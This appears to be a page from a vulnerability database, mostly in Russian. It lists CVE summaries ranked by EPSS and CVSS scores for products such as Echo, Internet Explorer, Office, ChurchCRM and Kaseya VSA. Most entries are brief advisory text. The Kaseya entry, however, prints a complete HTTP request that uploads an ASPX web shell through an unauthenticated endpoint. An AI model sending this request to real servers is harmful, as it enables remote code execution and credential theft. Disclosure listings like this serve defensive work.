Показать поиск и сортировку
Range: 0.0 - 10.0
Range: 0.000 - 1.000
Оценка EPSS
Оценка: 0.5877
CVSS 3.x
Оценка: 9.6
В Labstack Echo v4.8.0 обнаружена уязвимость открытого перенаправления через компонент Static Handler. Эта уязвимость может быть использована злоумышленниками для вызова Server-Side Request Forgery (SSRF).
Оценка: 0.5875
CVSS 2.0
Оценка: 9.3
Элемент управления ActiveX HxTocCtrl (hxvz.dll), используемый в Microsoft Internet Explorer 5.01 SP4 и 6 SP1, в Windows XP SP2, Server 2003 SP1 и SP2, Vista SP1 и Server 2008, позволяет удаленным злоумышленникам выполнять произвольный код через неправильно сформированные аргументы, что вызывает повреждение памяти.
Оценка: 8.8
Sonatype Nexus Repository Manager 3.x до версии 3.21.2 включительно имеет неправильный контроль доступа.
Оценка: 0.5874
Оценка: 6.8
Переполнение буфера на основе стека в функции check_file_head в extra.c в mcrypt 2.6.8 и более ранних версиях позволяет удаленным злоумышленникам с помощью пользователя выполнять произвольный код через зашифрованный файл со специально созданным заголовком, содержащим длинные данные salt, которые неправильно обрабатываются во время расшифровки.
Оценка: 0.5873
Microsoft Internet Explorer 7 иногда пытается получить доступ к неинициализированным областям памяти, что позволяет удаленным злоумышленникам выполнять произвольный код через специально созданный HTML-документ, вызывающий повреждение памяти, связанное с запросом WebDAV для файла с длинным именем, также известное как "Уязвимость повреждения памяти объектов HTML".
Оценка: 0.5872
Оценка: 9.8
ChurchCRM is an open-source church management system. Prior to version 5.21.0, a pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard allows unauthenticated attackers to inject arbitrary PHP code during the initial installation process, leading to complete server compromise. The vulnerability exists in `setup/routes/setup.php` where user input from the setup form is directly concatenated into a PHP configuration template without any validation or sanitization. Any parameter in the setup form can be used to inject PHP code that gets written to `Include/Config.php`, which is then executed on every page load. This is more severe than typical authenticated RCE vulnerabilities because it requires no credentials and affects the installation process that administrators must complete. Version 5.21.0 patches the issue.
Переполнение буфера на основе кучи в Microsoft Word 2002 SP3 позволяет удаленным злоумышленникам выполнять произвольный код через поврежденные записи в документе Word, также известная как "Word Heap Overflow Vulnerability".
Оценка: 0.5871
Оценка: 10.0
Переполнение буфера на основе стека в aircrack-ng airodump-ng 0.7 позволяет удаленным злоумышленникам выполнять произвольный код через специально созданные пакеты аутентификации 802.11.
Оценка: 6.1
В GLPI до версии 9.4.6 существует уязвимость, позволяющая обойти защиту от открытого перенаправления, основанную на regexp. Эта проблема была исправлена в версии 9.4.6.
Оценка: 0.5868
Microsoft Excel 2002 SP3 неправильно проверяет информацию о записях, что позволяет удаленным злоумышленникам выполнять произвольный код через специально созданный документ Excel, также известное как "Уязвимость разбора лишней записи вне границ".
Оценка: 5.0
Уязвимость обхода каталогов в OpenView5.exe в HP OpenView Network Node Manager (OV NNM) 7.01, 7.51 и 7.53 позволяет удаленным злоумышленникам читать произвольные файлы через последовательности обхода каталогов в параметре Action.
Оценка: 0.5867
Оценка: 7.8
Rapid7 Metasploit Framework версий до 5.0.85 страдает от CWE-78: внедрение команд ОС, в котором плагин libnotify принимает ненадежные данные, предоставленные пользователем, через имя хоста или имя службы удаленного компьютера. Злоумышленник может создать специально созданное имя хоста или имя службы для импорта Metasploit из различных источников и вызвать внедрение команды в терминал оператора. Обратите внимание, что этой проблеме подвержены только Metasploit Framework и продукты, которые предоставляют систему плагинов, в частности, это не относится к Rapid7 Metasploit Pro. Также обратите внимание, что эта уязвимость не может быть вызвана обычной операцией сканирования — злоумышленник должен предоставить файл, который обрабатывается командой db_import.
Оценка: 0.5864
Adobe Flash Player версий до 18.0.0.329 и 19.x и 20.x до 20.0.0.306 в Windows и OS X и до 11.2.202.569 в Linux, Adobe AIR до 20.0.0.260, Adobe AIR SDK до 20.0.0.260 и Adobe AIR SDK & Compiler до 20.0.0.260 позволяют злоумышленникам выполнять произвольный код, используя неуказанную "путаницу типов".
Microsoft Internet Explorer 10 позволяет удаленным злоумышленникам выполнять произвольный код или вызывать отказ в обслуживании (повреждение памяти) через специально созданный веб-сайт, также известная как «Уязвимость повреждения памяти Internet Explorer», которая отличается от CVE-2014-1790.
Оценка: 0.5863
Ошибка знака целого числа в Microsoft Publisher 2003 SP3 позволяет удаленным злоумышленникам выполнять произвольный код через специально созданный файл Publisher, который вызывает неправильное выделение памяти, также известную как "Уязвимость знакового целого числа Publisher".
Microsoft Publisher 2003 SP3, 2007 SP3 и 2010 SP1 позволяет удаленным злоумышленникам выполнять произвольный код через специально созданный файл Publisher, который вызывает неправильную обработку указателей, также известную как "Уязвимость обработки указателей Publisher".
Ошибка знака целого числа в Microsoft Publisher 2003 SP3 позволяет удаленным злоумышленникам выполнять произвольный код через специально созданный файл Publisher, который вызывает переполнение буфера, также известную как "Уязвимость переполнения буфера Publisher".
Microsoft Publisher 2003 SP3 неправильно проверяет размер неуказанного массива, что позволяет удаленным злоумышленникам выполнять произвольный код через специально созданный файл Publisher, также известную как "Уязвимость выделения отрицательного значения Publisher".
Переполнение целого числа в функции REPT в Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 и SP3, и 2007 Gold и SP1; Office Excel Viewer 2003 SP3; Office Excel Viewer; Office Compatibility Pack для Word, Excel и PowerPoint 2007 File Formats Gold и SP1; Office SharePoint Server 2007 Gold и SP1; Office 2004 и 2008 для Mac; и Open XML File Format Converter для Mac позволяет удаленным злоумышленникам выполнять произвольный код через файл Excel, содержащий формулу в ячейке, также известный как "Уязвимость синтаксического анализа формул".
Злоумышленник может загружать файлы с привилегиями процесса веб-сервера для Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 и впоследствии использовать эти файлы для выполнения команд asp. API /SystemTab/uploader.aspx уязвим для неаутентифицированной произвольной загрузки файлов, приводящей к RCE. Злоумышленник может загружать файлы с привилегиями процесса веб-сервера и впоследствии использовать эти файлы для выполнения команд asp. Подробное описание: Дан следующий запрос: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` Злоумышленник может контролировать имя файла, записываемого через параметр qqfile, и местоположение файла, записываемого через параметр PathData. Даже несмотря на то, что вызов требует передачи cookie sessionId, мы определили, что sessionId фактически не проверяется и любое числовое значение принимается как действительное. Обнаружены проблемы безопасности: * cookie sessionId требуется /SystemTab/uploader.aspx, но фактически не проверяется, что позволяет злоумышленнику обходить аутентификацию * /SystemTab/uploader.aspx позволяет злоумышленнику создавать файл с произвольным содержимым в любом месте, куда веб-сервер имеет доступ для записи * Процесс веб-сервера имеет доступ для записи в веб-корень, где злоумышленник может выполнить его, запросив URL-адрес вновь созданного файла. Воздействие: Эта произвольная загрузка файлов позволяет злоумышленнику размещать файлы по своему выбору в любом месте на жестком диске сервера, к которому имеет доступ процесс веб-сервера, включая (но не ограничиваясь) веб-корень. Если злоумышленник загружает файлы с кодом в веб-корень (например, код aspx), он может затем выполнить этот код в контексте веб-сервера, чтобы нарушить либо целостность, конфиденциальность, либо доступность системы, либо украсть учетные данные других пользователей. Другими словами, это может привести к полному компрометации системы.
Oracle Glassfish 2.1.1, 3.0.1 и 3.1.1, используемый в Communications Server 2.0, Sun Java System Application Server 8.1 и 8.2 и, возможно, в других продуктах, вычисляет хеш-значения для параметров формы, не ограничивая возможность предсказуемого возникновения коллизий хешей, что позволяет удаленным злоумышленникам вызывать отказ в обслуживании (потребление ЦП), отправляя множество специально созданных параметров, также известный как билет безопасности Oracle S0104869.